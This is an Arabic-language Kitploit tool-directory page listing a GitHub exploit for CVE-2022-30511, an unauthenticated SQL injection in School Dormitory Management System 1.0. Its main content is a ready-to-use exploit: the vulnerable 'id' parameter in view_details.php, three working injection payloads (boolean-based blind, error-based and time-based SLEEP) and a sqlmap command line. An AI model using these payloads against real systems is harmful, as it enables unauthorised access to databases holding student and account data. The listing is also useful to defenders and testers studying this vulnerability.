Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-30511 — نظام إدارة سكن الطلاب 1.0 - ثغرة حقن SQL بدون مصادقة | Kitploit
أدوات/GitHubGitHub/bigzooooz/cve-2022-30511
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقأمن قواعد البيانات
GitHubbigzooooz/cve-2022-30511

CVE-2022-30511

نظام إدارة سكن الطلاب 1.0 - ثغرة حقن SQL بدون مصادقة

عرض المستودع
111منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-30511

نظام إدارة سكن المدرسة 1.0 - حقن SQL بدون مصادقة

عنوان الاستغلال: نظام إدارة سكن المدرسة 1.0 - حقن SQL بدون مصادقة

التاريخ: 2022-05-25

CVE: CVE-2022-30511

مؤلف الاستغلال: عبدالعزيز سعد (@b4zb0z)

الصفحة الرئيسية للبائع: https://www.sourcecodester.com/

رابط البرنامج:

https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html

الإصدار: 1.0

تم اختباره على: LAMP, Ubuntu


[#] موقع الثغرة: $_GET['id'] في /dms/admin/accounts/view_details.php:4

المعامل: id (GET) النوع: أعمى قائم على Boolean العنوان: AND boolean-based blind - WHERE or HAVING clause الحمولة: page=accounts/view_details&id=2' AND 8853=8853 AND 'kujz'='kujz

root@kitploit:~
النوع: قائم على الخطأ
root@kitploit:~
العنوان: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
الحمولة: page=accounts/view_details&id=2' AND (SELECT 8739 FROM(SELECT COUNT(*),CONCAT(0x716a6b6a71,(SELECT (ELT(8739=8739,1))),0x71766b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'fkLf'='fkLf
root@kitploit:~
النوع: أعمى زمني
root@kitploit:~
العنوان: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
الحمولة: page=accounts/view_details&id=2' AND (SELECT 7339 FROM (SELECT(SLEEP(5)))Dkxx) AND 'UZCm'='UZCm

[#] الاستغلال باستخدام SQLMAP: sqlmap -u "http://localhost/dms/admin/?page=accounts/view_details&id=2" --dbms=mysql

تنزيل الأداة